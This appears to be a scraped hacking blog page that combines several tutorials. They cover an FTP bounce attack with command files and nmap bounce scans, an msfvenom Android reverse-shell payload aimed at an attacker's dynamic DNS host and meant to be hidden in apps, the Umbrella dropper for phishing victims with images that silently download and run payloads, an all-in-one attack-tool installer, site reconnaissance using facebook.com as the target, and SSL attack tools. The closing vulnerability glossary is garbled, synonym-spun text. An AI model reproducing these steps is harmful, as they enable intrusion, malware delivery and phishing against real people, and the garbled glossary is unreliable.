JP Morgan – $1B Fine – You Gotta Read This

0

I mean seriously… the rest of us have to play fair. They were allegedly running a racketeering operation?

Original post: https://shedly.com/5A4je

Social Media Site for Hackers?

0

How to Hack Internal Private Systems Using FTP Bounce Attack?

0

Hello hackers, so today we are going to learn how can we attack the internal ftp private servers for a public server which we have exploited earlier to get the login user credentials for FTP port using Brute force with Hydra. This method is known as FTP Bounce attack as we deploy packets which bounce through an intermediate public server to the private victim machine.

The motive

You are a user in at a foreign region with IP address F.F.F.F and want to retrieve cryptographic source code from crypto.com in US. The FTP server at crypto.com is set up so as to allow you the connection, but deny the access to the crypto sources because your source IP address is a non-US site [as the FTP server can determine your DNS server]. In any case, you cannot directly retrieve the source code from crypto.com’s server.

However, crypto.com allow ufred.edu to download crypto sources because ufred.edu is of US. It happens you know that incoming data for ufred.edu is a worldwide write-able directory, through which any anonymous user can drop files and read them back. Let us assume that the IP address for Crypto.com’s is C.C.C.C.

FTP Bounce secure connection

The attack

Now assuming you have an FTP server that does passive mode. Open an FTP connection to your own machine’s real IP address [not localhost] and log in. Change to a convenient directory that you have the write access to, and then do:

	quote "pasv"
	quote "stor foobar"

Take note of the address and port that are returned from the PASV command, F,F,F,F,X,X. This FTP session will now hang, so background it or flip to another window or something to proceed with the rest of this.

Construct a file containing FTP server commands. Let’s call this file”instrs". It will look like this:

	user ftp
	pass -anonymous@
	cwd /export-restricted-crypto
	type i
	port F,F,F,F,X,X
	retr crypto.tar.Z
	quit
	^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
	^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
	...

F,F,F,F,X,X is the same address and port that your own machine handed you on the first connection. The trash at the end is extra lines you create, each containing 250 NULLS and nothing else, enough to fill up about 60K of extra data.

Open an FTP connection to ufred.edu, log in anonymously, and cd to /incoming. Now type the following into this FTP session, which transfers a copy of your”instrs” file over and then tells ufred.edu’s FTP server to connect to crypto.com’s FTP server using your file as the commands:

	put instrs
	quote "port C,C,C,C,0,21"
	quote "retr instrs"

Crypto.tar.Z should now show up as”foobar” on your machine via your first FTP connection. If the connection to ufred.edu didn’t die by itself due to an apparently common server bug, clean up by deleting “instrs” and exciting. Otherwise, you’ll have to reconnect to finish.

FTP Bounce Port Scanning
You can use the nmap port scanner in Unix and Windows environments to perform an FTP bounce port scan, using the -P0 and -b flags in the following manner:

nmap -P0 -b username:password@ftp-server:port <target host>

shows an FTP bounce port scan being launched through the Internet-based 142.51.17.230 to scan an internal host at 192.168.0.5, a known address previously enumerated through DNS querying.

FTP bounce scanning with nmap

# nmap -P0 -b 142.51.17.230 192.168.0.5 -p21,22,23,25,80Starting nmap 3.45 ( www.insecure.org/nmap/ )

Interesting ports on (192.168.0.5):

Port State Service

21/tcp open ftp

22/tcp open ssh

23/tcp closed telnet

25/tcp closed smtp

80/tcp open http

Nmap run completed — 1 IP address (1 host up) scanned in 12 seconds

Note :
When performing any type of bounce port scan with nmap, you should specify the -P0 option. This will prevent an attacker from probing the target host to ascertain whether it is up.

FTP Bounce Exploit Payload Delivery

If you can upload a binary file containing a crafted buffer overflow string to an FTP server that in turn is vulnerable to bounce attack, you can then send that information to a specific service port (either on the local host or other addresses). This concept is shown in Figure 8-2.

 An illustration of the FTP payload bounce attack

 

FTP Bounce firewall block

For this type of attack to be effective, an attacker needs to authenticate and log into the FTP server, locate a writeable directory, and test to see if the server is susceptible to FTP bounce attack. Solaris 2.6 is an excellent example because in its default state it is vulnerable to FTP bounce and RPC service overflow attacks. Binary exploit data isn’t the only type of payload that can be bounced through a vulnerable FTP server: spammers have also sent an unsolicited email this way.

Other possibilities

Despite the fact that such third-party connections are one-way only, they can be used for all kinds of things. Similar methods can be used to post virtually untraceable mail and news, hammer on servers at various sites, fill up disks, try to hop firewalls, and generally be annoying and hard to track down at the same time. A little thought will bring the realisation of numerous other scary possibilities.

FTP Bounce Description

Connections launched this way come from source port 20, which some sites allow through their firewalls in an effort to deal with the “ftp-data” problem. For some purposes, this can be the next best thing to source-routed attacks and is likely to succeed where source routeing fails against packet filters. And it’s all made possible by the way the FTP protocol spec was written, allowing control connections to come from anywhere and data connections to go anywhere.

If you like this article kindly rate it and do share. if you have any queries please comment below and let us know how you felt about the article. To know how to find devices on the internet to hack into them read the article on How To Use Shodan For Finding Vulnerable Targets, Information Gathering & Hacking?

Thank you.

Any Android Can Be Hacked Over The Internet Using Metasploit Part : 1

0

Today we’ll create metasploit payload embedding into android application and use it over Internet!

First we’ve to get the DDNS (Dynamic DNS) address to get the meterpreter session on the internet; so go to NOIP Dynamic DNS service and create an account there then you have to configure the DDNS with your system

So for Linux distributions:

Once you have opened up your Terminal window you will need to login as the “root” user. You can become the root user from the command line by entering “sudo -s” followed by the root password on your machine.

  1. cd /usr/local/src/
  2. wget http://www.no-ip.com/client/linux/noip-duc-linux.tar.gz
  3. tar xf noip-duc-linux.tar.gz
  4. cd noip-2.1.9-1/
  5. make install

You will then be prompted to login with your No-IP.com account username and password.

If you get “make not found” or “missing gcc” then you do not have the gcc compiler tools on your machine. You will need to install these in order to proceed.

Hack Any Android Over Internet Using Metasploit Part : 1

To Configure the Client

As root again (or with sudo) issue the below command:

/usr/local/bin/noip2 -C

(dash capital C, this will create the default config file)

You will then be prompted for your username and password for No-IP, as well as which host-names you wish to update. Be careful, one of the questions is “Do you wish to update ALL hosts”. If answered incorrectly this could effect hostnames in your account that are pointing at other locations.

Now the client is installed and configured, you just need to launch it. Simply issue this final command to launch the client in the background:

/usr/local/bin/noip2

Read the README file in the no-ip-2.1.9 folder for instructions on how to make the client run at startup. This varies depending on what Linux distribution you are running.

After getting your DDNS (it’ll be like hostname.ddns.net) configured you’ve to create metasploit Payload.

Secondly we’ve to create a msf payload using msfvenom:
command :

msfvenome -p android/meterpreter/reverse_tcp LHOST=hostname.ddns.net LPORT=4444 R> payload.apk

So the payload will be created.

Thirdly we’ve to bind the Payload with any other APK files like games or any applications etc
for that we should decomplie APK to put the metasploit Hook inside there.
Let’s see this in second (Last) Part : 2

Do comment below your feedback on this article! Thank You!

How to Hack Using Umbrella Dropper!? A Phishing Tool

0

Hello, hackers, Today we are going to know about Umbrella Dropper, which is dedicated to most pen-testing, it downloads files on the target system and executes them without a double execution of .exe, only of embed.

I know most of you might want to hack victims only by sending a real file, which when opened open ups a malicious link which automatically downloads the payload from a remote server and executed it without the need of double execution of .exe file which has been downloaded. even you can hack a victim by simply embedding a malicious backdoor as a zip file with the image and sending it to the victim to read on it follow the article on How To Hack Any Windows 7/8/10 Remotely Using An Image

Well, there are a lot of tools for that and thanks to Github to be an open source for developers and testers for sharing source code and files. Git Hub has been the heaven for penetration testers and n00bies for getting cool and perilous stuff to generate a various payload, scanners and injectors,etc….

Features

  • Download executable on the target system.
  • Silent execution.
  • Download and execute executable once time.
  • If the exe already had downloaded and running, open only pdf/docx/xxls/jpg/png.
  • Some Phishing methods are included.
  • Multiple Session disabled.
  • Bypass UAC.

Needed dependencies

  • apt
  • wine
  • wget
  • Linux
  • sudo access
  • python2.7
  • python 2.7 on Wine Machine

Installation of Umbrella:

  • first, we need to clone[download] the GitHub repository by the command “git clone https://github.com/4w4k3/Umbrella.git
  • Now change your directory to the downloaded folder “cd Umbrella
  • Obtain the permission for the installer file using the command “chmod +x install.sh
  • Run the installer using “./install.sh”. this will attempt to install all the requires dependencies needed for the program to run and update your system

umbrella dropper files

  • To run the script we use “Python.py”, since the script is a python script we first notify terminal that we are running a python script using the term python, we can also run using “./” which means executable file for Linux operating system

umbrella dropper python installation

  • During the installation you will be prompted with wine installation pop-up, we just need to specify Windows 7 or XP which will attempt to install windows .net framework to create an executable file. Next, it will ask you to install Python choose repair option to make necessary changes to the python libraries.

umbrella dropper error

Note: If you face any problems with installation or any error in Python the simply type in “python -m pip install –upgrade pip” this will attempt to upgrade all the python modules and debugs the installation automatically.

Using Umbrella Dropper:

After the installation you will be greeted with the umbrella interface where you will have four options saying:

umbrella dropper interface

  1. [D] GEN DROPPER
  2. [H] HELP
  3. [U] UPDATE
  4. [E] EXIT

umbrella dropper payload options

To generate payload type in D

This time you need to specify the file type you wish to use for the exploit. Next, you need to specify the URL for the .exe file.

Suppose you are running Apache locally then place the malicious payload [say payload.exe] generated from various payload generating tools in your ‘/var/www/html/” directory and the URL would be your local “IPaddress/payload.exe”.To know your local ip type in “ifconfig” in can terminal. If you are conducting a hack on the WAN then you need to upload the malicious file to any open web server accessible through the world wide web publically. but for this tutorial am using my local web server as shown in the screenshot:

umbrella dropper payload URL

When it asks for the URL then enter the URL for the payload on the server, but remember to check if the victim can access it or not. if the victim cant then its complete waste of time. Now it will ask to enter the image URL as a transporter as seen below I have given the URL in the screenshot:

umbrella dropper transport URL

This will produce a file in the “dist/” directory of the umbrella folder. send this to the victim when he opens the image the payload gets automatically executed. But if you think as a hacker, we can take advantage of the feature as When the victim opens the files the web browser opens the embedded link and since our link contains a payload it will be downloaded and automatically executed without the double execution of the payload and we will get a meterpreter session in our terminal. If we can select a favourite image regarding the victim likes by social engineering him as if, an example of a hacker, we can embed a payload to an image which can be selected to be kept as a background image and upload it to a file sharing server we can also create an album regarding the selection of the background image and infect all the image of the album and send the link to the victim to take a look on the album and if the victim suppose to like an image and download’s it then our job is done. now umbrella will do its magic and present us with a meterpreter shell.

But as mentioned to be a hacker you need not hack rather than thinking like a hacker, finally it’s all up to you to develop ideas regarding techniques of hacking a victim. If you like this article kindly rate it above and share it. If you have any queries then comment below to let us know how, to know how to hack Kali Linux then read the article on How To Hack The Hacker’s OS Kali Linux. Thank you.

How To Hack Anything Using All-In-One lscript Tool ? : Step-By-Step Guide

0

Hello hackers, Hope you guys are doing well. so today’s tutorial is for our n00bies and to all those hackers who want to get all tools into a single tools making them type less. This “lscript” tool is a script written by Aris Melachroinos, which allows you to automate penetration testing or hacking easily. It installs all the best tools available until 2017 for Kali Linux.

FEATURES: Custom keyboard shortcuts, launch any tool within lscript
Enabling-Disabling interfaces faster
Changing Mac faster
Anonymizing yourself faster
View your public IP faster
View your MAC faster
**TOOLS**
	(This installer installs every tool you need automatically! (except Zatacker))
	Fluxion				by Deltaxflux
	WifiTe				by derv82
	Wifiphisher			by Dan McInerney
	Zatacker			by ???
	Morpheus			by Pedro ubuntu  [ r00t-3xp10it ]
	Osrframework			by i3visio
	Hakku				by 4shadoww
	Trity				by Toxic-ig
	Cupp				by Muris Kurgas
	Dracnmap			by Edo -maland-
	Fern Wifi Cracker		by Savio-code
	Kichthemout			by Nikolaos Kamarinakis & David Schütz
	BeeLogger			by Alisson Moretto - 4w4k3
	Ghost-Phisher			by Savio-code
	Mdk3-master                     by Musket Developer
	Anonsurf                        by Und3rf10w
	The Eye                         by EgeBalci
	Airgeddon                       by v1s1t0r1sh3r3
	Xerxes                          by zanyarjamal
	Ezsploit                        by rand0m1ze
	Katana framework                by PowerScript
	4nonimizer                      by Hackplayers
	Sslstrip2                       by LeonardoNve
	Dns2proxy                       by LeonardoNve
	Pupy                            by n1nj4sec
	Zirikatu                        by pasahitz
	TheFatRat                       by Sceetsec
	Angry IP Scanner                by Anton Keks
	Sniper                          by 1N3
	ReconDog                        by UltimateHackers
	RED HAWK                        by Tuhinshubhra
**Wifi password scripts**
	Handshake       (WPA-WPA2)
	Find WPS pin    (WPA-WPA2)
	WEP hacking     (WEP)

How to Install lscript ?

This tool is available on Github and follow the simple step to install it

  1. Open up a terminal and navigate to your working directory
  2. Type in the following command "git clone https://github.com/arismelachroinos/lscript.git" this will attempt to clone the github repository into a single folder named lscript
  3. Now change your directory to the cloned folder from github using this command "cd lscript”
  4. Type in “ls” to know the files present in the working directory, but first, we need to get the permissions to execute the setup file, to do this type “chmod +x install.sh”lscript installation
  5. Type “./install.sh” to start your installation process. This will attempt to download all the required dependencies and tool from Github

How to use lscrpit ?

  1. Open another terminal and type in “l“, this will start the lazy script.
  2. Now you will be displayed with option for
  • ifconfig
  • Enabling/Disabling Wi-Fi and Monitor mode on wifi
  • Changing/Restoring MAC
  • Starting/disabling Anonymous surf
  • checking the anonymous status
  • view your public IP Address
  • View your MAC ID
  • Tools available with in the script (downloaded/required to be downloaded)
  • Handshakes captured
  • Find WPS pin
  • WEP Hacking
  • MITM attack
  • Metasploit
  • E-Mail Spoofing … as shown in the screenshot:

How To Hack Anything Using All-In-One lscript Tool ? : Step-By-Step Guide

 

to check for tools type in “9“, it will list available options for Tools as shown in the following screenshot, we can see that we have options for

  • Wi-Fi tools
  • Remote Access
  • Information Gathering
  • Installing /Re installing tool

lscript tool menu

to list all the available tools which we can install move into Installing tools, this will list all the tools available to us as described above and is shown in the following screenshot.

lscript tools script

to list the tools present for us in remote access  we check in to remote access and could find the most useful tools for creating payloads to exploit victim as seen in the screenshot:

for wifi hacking, we have many tools as we can see to be listed in the screenshot:

lscript wifi tools description

so without wasting your time install this tools, to save you time from typing and being lazy, hope you would like this article, and please comment below if you have any queries regarding the tool or any other topic and do share so that your hacker group can come to know about this awesome tools available publicly on the internet. If you wish to know how to hack Kali Linux read this article How To Hack The Hacker’s OS Kali Linux  and if you want to hack your friend with in network then follow the article on How To Hack With Xerosploit

Thank you.

RED HAWK: Multiple Scanning And Attack Vector

0

Hello friends, so today we are going to know about a tool RED HAWK, which can be used to gather some information regarding a target and determine some crucial information regarding the hosting information of the company, location, protocols used etc…… these come under Information gathering. It is the most crucial part for any hacker or pentester to perform a hack or simulate a hack. Information gathering mainly consist of

  • Network architecture
  • Connected devices
  • Open ports
  • Running services
  • Known vulnerabilities
  • Password profiling,etc……

There are many information gathering tools available over GitHub and over the internet out of that many ones is RED HAWK

RED HAWK is one of Best Information gathering tool written in PHP.it’s an all in one tool capable of gathering like Information Gathering (using WHOIS lookup, WordPress, Reverse IP Scanner etc.), SQL Vulnerability Scanning and Crawling.

to know more about information gathering visit this page Information Gathering

Features Of The Tool:

  • Server detection
  • CloudFlare detector
  • robots scanner
  • CMS Detector
  • WordPress
  • Joomla
  • Drupal
  • Magento
  • Whois
  • GEO-IP Scan
  • NMAP Port Scan
  • DNS Lookup
  • SubNet Calculator
  • Subdomain Finder
  • Reverse IP Scanner
  • CMS detection For Sites On the same server.
  • Parameter Finder
  • Error based SQLi Detector
  • Crawler
  • Basic Crawler {69}
  • [ – ] Admin scanner
  • [ – ] Backups Finder
  • [ – ] Misc. Crawler
  • Advance Crawler{420}
  • [ – ] Admin scanner
  • [ – ] Backups Finder
  • [ – ] Misc. Crawler

To access RED HAWK we need to clone it from Github or download the zip file from GitHub

The Installation:

  1. Open up a terminal and type in “git clone https://github.com/Tuhinshubhra/RED_HAWK.git

This will attempt to clone the git repository and will place all the files in the repository into a directory named RED_HAWK of you working directory.

If you have downloaded zip then just extract it and open a terminal in the extracted folder

  1. Now change you directly to the RED_HAWK folder using the command “cd RED_HAWK
  2. We can list the available files in the folder using the ‘ls’ command. To run the RED HAWK type in “php rhawk.php”.
  3. You will get the RED HAWK interface. Type “help” to list the available options for us NOTE: if you face any error in the run the tool then type “fix” this will Install All Required Modules.Fix content
  4. Type in the domain name you want to scan (without Http:// OR Https://).for example we are setting facebook.com  as a target.
  5. Select whether The Site Runs On HTTPS or not. If it does it is preferred to select HTTPS for better scanning and results.

NOTE: if Scanner Stops Working After CloudFlare Detection! Use The fix Command OR Manually Install php-curl & php-xml

as seen in the below screenshot it does a nmap scan to identify services on ports and find open ports to gather information related to the operating system running, Firewall, Traceroute etc… to know more about nmap scan, please read this article All Nmap tool commands at your fingertips!

it also does a DNS scan related to our target to determine for DNS vulnerabilities and display the subnet available for the target we selected, as we can see that we get information regarding that Facebook usesIPv6 protocol

this tool also determines the geographical location of our target similar to the results of shodan, to know about shodan read this article on How To Use Shodan For Finding Vulnerable Targets, Information Gathering & Hacking?

as mentioned this tool does more than we can imagine. this tool does our work more easy by automating all the required tasks of Information gathering, taking each and every single point of interest regarding our target.

hope you had enjoyed reading this article if you did kindly share to let your hacker friend(s) know that there is a tool which can let his/her work of information gathering more simple and easy giving him/her a plenty of time to plan the attack. If you have any queries regarding the article then do comment below and let us know how you felt reading the article. Thank You.

How To Hack Any SSL-Protected (https) Website Using SSLScan ? : Step-By-Step Guide

0

Ever wondered what will be the consequences if the link that is established between web server and browser is not encrypted one or a secured? Many attacks can happen !!so that is the reason why Secure Socket Layer  SSL is used.

By this we can assume like SSL is very secure and hard to hack!! But it is no more!!!

Wanna Know how to hack websites that are even protected by SSL then you shouldn’t miss the article . Let’s get into it.

Attacking Secure Sockets Layer

Secure Sockets Layer (SSL) and Transport Layer Security (TLS), are cryptographic protocols used to provide secure communications across the Internet.

These protocols have been widely used in secure applications like the Internet messaging and e-mail, web browsing, and voice-over-IP.

These protocols are used across the Internet, they were started in the mid of1990s and are increasingly coming under attack. SSL Version 2.0 (Version 1.0 was never publicly released) contains a significant number of flaws that can be exploited, such as poor key and are vulnerable to man-in-the-middleattacks.

Although most users use Version 3.0 protocol and its newer versions of TLS, a misconfiguration can still lead to vulnerability.

Configuring Kali for SSLv2 scanning

Before beginning, verify that Kali has been configured to scan for SSL 2 protocols.

From a terminal window, enter the following command:


root@kali:~# openssl_s_client –connect www.opensecurityresearch.com:443 -ssl2

If this returns an unknown option -ssl2 error, then the additional configuration will be required.

To fix it, following these steps carefully:

  1. Install quilt, a program used to manage multiple patches to an application’s source code, using the following command:

root@kali:~# apt-get install devscripts quilt

  1. Download the openssl source code, and apply the patches, update the configuration files, and then rebuild the application. Use the following commands:

root@kali:~# apt-get source openssl

root@kali:~# cd openssl-1.0.1e

root@kali:~/openssl-1.0.1e# quilt pop –a

 

  1. Edit the /openssl-1.0.1e/debian/patches/series file, and delete the following line:

ssltest_no_sslv2.patch

  1. Edit the /openssl-1.0.1e/debian/rules file, and delete the no-ssl2 argument and apply patches to openssl. Use the following commands:

root@kali:~/openssl-1.0.1e# quilt push -a

root@kali:~/openssl-1.0.1e# dch -n 'Allow SSLv2'

  1. After completing, rebuild the openssl package, and then reinstall it. This step can be performed with the following commands:

root@kali:~/openssl-1.0.1e# dpkg-source --commit

root@kali:~/openssl-1.0.1e# debuild -uc -us

root@kali:~/openssl-1.0.1e# cd /root

root@kali:~# dpkg -i *ssl*.deb

  1. Confirm that patches have been successfully applied by reissuing the command to connect using SSLv2, as shown in the following screenshot:

Kali scripts that rely on openssl, particularly sslscan, will need to be recompiled. To recompile, first, download the source and then rebuild it. When this is complete, reinstall it using the following commands:


root@kali:~# apt-get source sslscan

root@kali:~# cd sslscan-1.8.2

root@kali:~/sslscan-1.8.2# debuild -uc -us

root@kali:~/sslscan-1.8.2# cd /root

rootl@kali:~# dpkg -i *sslscan*.deb

 

Reconnaissance of SSL connections

The reconnaissance phase remains important when assessing the SSL connectivity, especially when reviewing the following items:

 

  • The x.509 certificate which is used to identify the systems involved in establishing the connection
  • The type of encryption which is being used
  • The configuration information

The SSL certificate can provide information which can be used for social Engineering attack. An attacker must check if the certificate is valid or not. Certificates that are invalid may cause an error in the signature.

If the user had previously accepted an invalid certificate, then the victim might accept a new invalid certificate, making the attacker easy.

The type of encryption used to secure an SSL connection is basically divided into the following categories:

  • Null cyphers: These cyphers are used to verify the authenticity of a transmission. Because no encryption is applied, they do not provide any security.
  • Weak cyphers: This is the cyphers with a key length of 128 bits or less. Cyphers that use the Diffie-Hellman algorithm for a key exchange can also be considered as weak since they are vulnerable to

man-in-the-middle attacks.

  • Strong cyphers: These are those cyphers that exceed 128 bits. currently, the most secure option is the AES encryption with a 256-bit key.

SSL and TLS rely on cypher suites to establish a secure connection. There are more than 30 such suites, and the complexity for selecting the best option results in users defaulting to less secure options. Therefore, each SSL and TLC connection must be tested.

To conduct reconnaissance against SSL connections, use the NSE modules of nmap or SSL-specific applications. The nmap NSE modules are described in the following table.

 

Nmap NSE module Module Function
ssl-cert Retrieves the server’s SSL certificate. The amount of information returned depends on the verbosity level (none, -v, and -vv).
ssl-date Retrieves a target host’s date and time from its TLS ServerHello response.
ssl-enum-ciphers Repeatedly initiates SSL and TLS connections, each time trying a new cypher and recording if the host accepts or rejects it. Cyphers are shown with a strong rate. This is a highly intrusive scan and may be blocked by the target.
ssl-google-cert-catalog Queries Google’s Certificate Catalogue for information that pertains to the SSL certificate retrieved from the target. It provides information on how recently, and for how long, Google has been aware of the certificate. If a certificate is not recognised by Google, it may be suspicious/false.
ssl-known-key Checks whether the SSL certificate used by a host has a fingerprint that matches databases of compromised or faulty keys. Presently, it uses the LittleBlackBox database. However, any database of fingerprints can be used.
sslv2 Determines whether the server supports the obsolete and less secure SSL Version 2 and which cyphers are supported.

To invoke a single script from the command line, use the following command:


root@kali:~# nmap --script <script name> -p 443 <Target IP>

In the following example, the ssl-cert script was invoked with the -vv option for maximum verbosity. The data on from this script is shown in the following screenshot

During the reconnaissance, an attacker can launch all SLL modules using the following command:


root@kali:~# nmap --script "ssl*" <IP address>

Kali’s attack tools that are specific to SSL can be invoked from the command line or selected from the menu by navigating to Kali Linux | Information Gathering | SSL Analysis. The tools are mentioned in the table below:

 

Tool Function
sslcaudit Automates the testing of SSL and TLS clients to determine the resistance against man-in-the-middle attacks.
Ssldump Conducts network protocol analysis of SSLv3 and TLS communications. If provided with the appropriate encryption key, it will decrypt SSL traffic and display it in the clear.
Sslscan Queries SSL services to determine which cyphers are supported. Output includes the preferred SSL cyphers and is displayed in text and XML formats.
Sslsniff Enables man-in-the-middle attack conditions on all SSL connections over a particular LAN, dynamically generating certificates for the domains that are being accessed on the fly.
Sslsplit Performs man-in-the-middle attacks against SSL and TLS networks. Connections are transparently intercepted through a network address translation engine and redirected to sslsplit, which terminates the original connection and initiates a new connection to the original destination while logging all the transmitted data. It supports plain TCP, SSL, HTTP/HTTPs, and IPv4 and IPv6.
Sslstrip Designed to transparently hijack the HTTP traffic on a network, watch for HTTPS links, and redirect and then map these links to spoofed HTTP or HTTPS links. It also supports modes to supply a favicon that looks like a lock icon as well as selective logging of intercepted communications.
Sslyze Analyses the SSL configuration of a server.
Tlssled Unifies the use and output of several other SSL-specific applications, checks for encryption strength, certificate parameters, and renegotiation capabilities.

 

The most commonly used are sslscan, which queries SSL services in order to determine the certificate details and the cyphers associated. The output is a text or XML formats. When a particular connection, use the –no-failed option, as in the screenshot, to have sslscan show only the accepted cypher suites.

The sslyze Python tool analyses the server’s SSL configuration and validates the certificate, tests for weak cypher suites, and identifies the configuration information that may support additional attacks.

Another SSL reconnaissance tool is tlssled.

These were some key points on Secure Socket Layer SSL reconnaissance for hunting down victim and playing with cyphers….

I hope you all enjoyed reading this article..

Let me know your Experiences in the comment section below

Happy Hacking!!!

How To Find Vulnerabilities In A Website? : (Bug Hunting)

0
Vulnerabilities

Nothing is impeccable on the planet including Web sites.

Any site might be capable yet certainly have some kind of defects only Vulnerabilities.

Regardless of whether it might be white or dark cap programmer, they should discover vulnerabilities with a specific end goal to hack the site.

we will know how to discover vulnerabilities in this Article, So Let’s Jump into it.

Vulnerability 

A weakness, in data innovation (IT), is a blemish in code or outline that makes a potential purpose of security bargain for an endpoint or system.

Vulnerabilities make conceivable assault vectors, through which a gatecrasher could run code or get to an objective framework’s memory.

The methods by which vulnerabilities are abused are shifted and incorporate code infusion and support overwhelms they might be led through hacking scripts, applications, and freehand coding.

Vulnerabilities are always being looked into and identified by the security business, programming organizations, digital crooks and different people.

A few organizations offer bug bounties for these disclosures.

 

 

Types of Vulnerabilities

Command Injection

Order infusion is a strategy, which enables an aggressor to execute framework orders by manhandling an application include.

The infusion ordinarily happens when the engineer is utilizing client contribution to develop an executable order particularly to the pseudo framework shell being used.

Expression Language Injection

Articulation Language Injection happens when assailant controlled information enters a mediator, i.e. the information is assessed as a code.

 Default Login

A default login is a sort of login, which is the same for each occasion of the application.

It’s commonly used to allow the first-time access to equipment packaged control boards and organization interfaces.

Local File Include

A Local File Include is a weakness, which enables assailants to recover or execute server-side documents.

The defenselessness emerges by the way that the designer is permitting the not disinfected client provided contribution to be utilized as a part of capacities used to open, read or show the substance of documents.

Remote Code Injection

Remote Code Injection is a powerlessness, which enables an aggressor to remotely infuse code into an application keeping in mind the end goal to change its execution stream.

The issue normally happens because of the way that the application is composed in a dialect, which permits dynamic assessment of code at runtime.

Remote File Include

A Remote File Include is a powerlessness, which enables assailants to control the application keeping in mind the end goal to incorporate a remote record facilitated by a third get-together server.

This document might be executable, normally written in a scripting dialect.

SQL Injection

SQL Injection is a code infusion method, which misuses a security defenselessness happening in the database layer of a web application.

The helplessness is available when client input is mistakenly sifted for uncommon characters inserted in a SQL explanation and in this way out of the blue executed, i.e. the info was infused into the SQL proclamation issued by the web application.

Vanilla SQL Injection

SQL Injection is a code infusion strategy, which misuses a security helplessness happening in the database layer of a web application.

The helplessness is available when client input is erroneously separated for uncommon characters inserted in a SQL explanation and accordingly startlingly executed, i.e. the info was infused into the SQL explanation issued by the web application.

Weak Session Management

This happens when the web application creates a session treat, which esteem is effortlessly guessable.

For instance, the session might be founded on UNIX timestamps or only an MD5 of a timestamp, and so on.

Cross-site Scripting

XSS is a sort of web application security helplessness, which permits code infusion by malevolent web clients into the pages seen by different clients.

LDAP Injection

LDAP Injection is a Code Injection method utilized against applications, which build LDAP articulation in light of client input.

It is an application convention used to get to and keep up circulated registry administrations like Microsoft‘s Active Directory.

Persistent Cross-site Scripting

XSS is a kind of web application security powerlessness, which permits code infusion by malevolent web clients into the site pages seen by different clients.

Put away Cross-website Scripting is a kind of XSS where the infused content is for all time put away on to the web server/application.

At whatever point a client asks for a contaminated page from the server the payload is straightforwardly conveyed implanted in the reaction so it will be executed without the need of client intercession.

Reflected Cross-site Scripting

XSS is a kind of web application security defenselessness, which permits code infusion by pernicious web clients into the website pages seen by different clients.

Reflected Cross-website Scripting is a kind of XSS where the infused code is reflected off the web server.

This sort of XSS is fleeting and requires a phishing vector to be conveyed to the casualty.

XML Injection

XML Injection is a Code Injection variation, which can be utilized by assailants to incorporate vindictive XML square, which is then utilized by an XML processor.

XPATH Injection

XPATH Injection is a Code Injection strategy which is utilized when an application utilizes client provided information to create XPATH inquiries to recover and compose information put away in XML shape.

Cross-site Request Forgery

CSRF is an assault which constrains an end-client to execute undesirable activities on a web application with which he is at present confirmed.

Applications helpless of this assault have no real way to recognize genuine solicitations from produced ones.

Open Cross Domain Policy

A Cross-Domain Policy File is utilized to authorize a similar starting point strategy in present-day web applications by keeping a few sorts of substance from being gotten to or altered from another space by means of the customer.

An open cross-area is the helplessness, which happens when the arrangement document unequivocally permits each outside space.

Best Open Source Web Application Vulnerability Scanners 

Grabber:

Grabber is a pleasant web application scanner which can identify numerous security vulnerabilities in web applications.

It performs outputs and tells where the powerlessness exists.

 

It can recognize the accompanying vulnerabilities:

  • Cross site scripting
  • SQL infusion
  • Ajax testing
  • Record consideration
  • JS source code analyzer
  • Reinforcement record check
Vega

Vega is another free open source web powerlessness scanner and testing stage.

With this instrument, you can perform security testing of a web application.

This apparatus is composed in Java and offers a GUI based condition.

It is accessible for OS X, Linux and Windows.

 

It can be utilized to discover SQL infusion, header infusion, index posting, shell infusion, cross website scripting, record consideration and other web application vulnerabilities.

This apparatus can likewise be broadened utilizing an intense API written in JavaScript.

While working with the apparatus, it gives you a chance to set a couple of inclinations like aggregate number of way relatives, number of tyke ways of a hub, profundity and greatest number of demand every second.

You can utilize Vega Scanner, Vega Proxy, Proxy Scanner and furthermore Scanner with qualifications.

Zed Attack Proxy

Zed Attack Proxy is otherwise called ZAP.

This instrument is open source and is produced by OWASP.

It is accessible for Windows, Unix/Linux and Macintosh stages

 

I for one like this instrument. It can be utilized to locate an extensive variety of vulnerabilities in web applications.

Instrument is extremely straightforward and simple to utilize.

Regardless of the possibility that you are new to entrance testing, you can without much of a stretch utilize this apparatus to begin learning infiltration testing of web applications.

To Know Complete Working of  ZAP  Click Here

Wapiti

Wapiti is likewise a decent web weakness scanner which gives you a chance to review the security of your web applications.

Performs discovery testing by checking pages and infusing information.

It tries to infuse payloads and check whether a script is powerless.

 

Underpins both GET and POSTHTTP assaults and recognizes various vulnerabilities.

It can distinguish following vulnerabilities:

  • Document Disclosure
  • Document incorporation
  • Cross Site Scripting (XSS)
  • Order execution location
  • CRLF Injection
  • SEL Injection and Xpath Injection
  • Feeble .htaccess setup
  • Reinforcement documents revelation
  • also, numerous other

Wapiti is an order line application.

Along these lines, it may not be simple for learners. In any case, for specialists, it will perform well.

Skipfish

Skipfish is likewise a decent web application security device.

It slithers the site and after that check each pages for different security dangers and toward the end readies the last report.

This device was composed in C.

 

It is exceedingly advanced for HTTP taking care of and using least CPU.

Guarantees that it can undoubtedly deal with 2000 solicitations for each second without including a heap CPU.

utilizes a heuristics approach while slithering and testing website pages.

This device likewise claims to offer high caliber and less false positives.

This instrument is accessible for Linux, FreeBSD, MacOS X, and Windows.

Ratproxy

Ratproxy is additionally an open source web application security review instrument which can be utilized to discover security vulnerabilities in web applications.

It is underpins Linux, FreeBSD, MacOS X, and Windows (Cygwin) conditions.

This device is intended to beat the issues clients normally confront while utilizing other intermediary devices for security reviews.

 

 

It is fit for recognizing CSS templates and JavaScript codes.

It likewise underpins SSL man in the center assault, which implies you can likewise observe information going through SSL.

Grendel-Scan

Grendel-Scan is another pleasant open source web application security instrument.

This is a programmed instrument for discovering security vulnerabilities in web applications.

Many elements are likewise accessible for manual entrance testing.

 

This device is accessible for Windows, Linux and Macintosh.

This device was produced in Java.

X5S

X5s is likewise a Fiddler add-on which intends to give an approach to discover cross-site scripting vulnerabilities.

This is not a programmed device.

 

 

In this way, you have to see how encoding issues can prompt XSS.

You have to physically discover the infusion point and after that check where XSS can be in the application.

Nikto

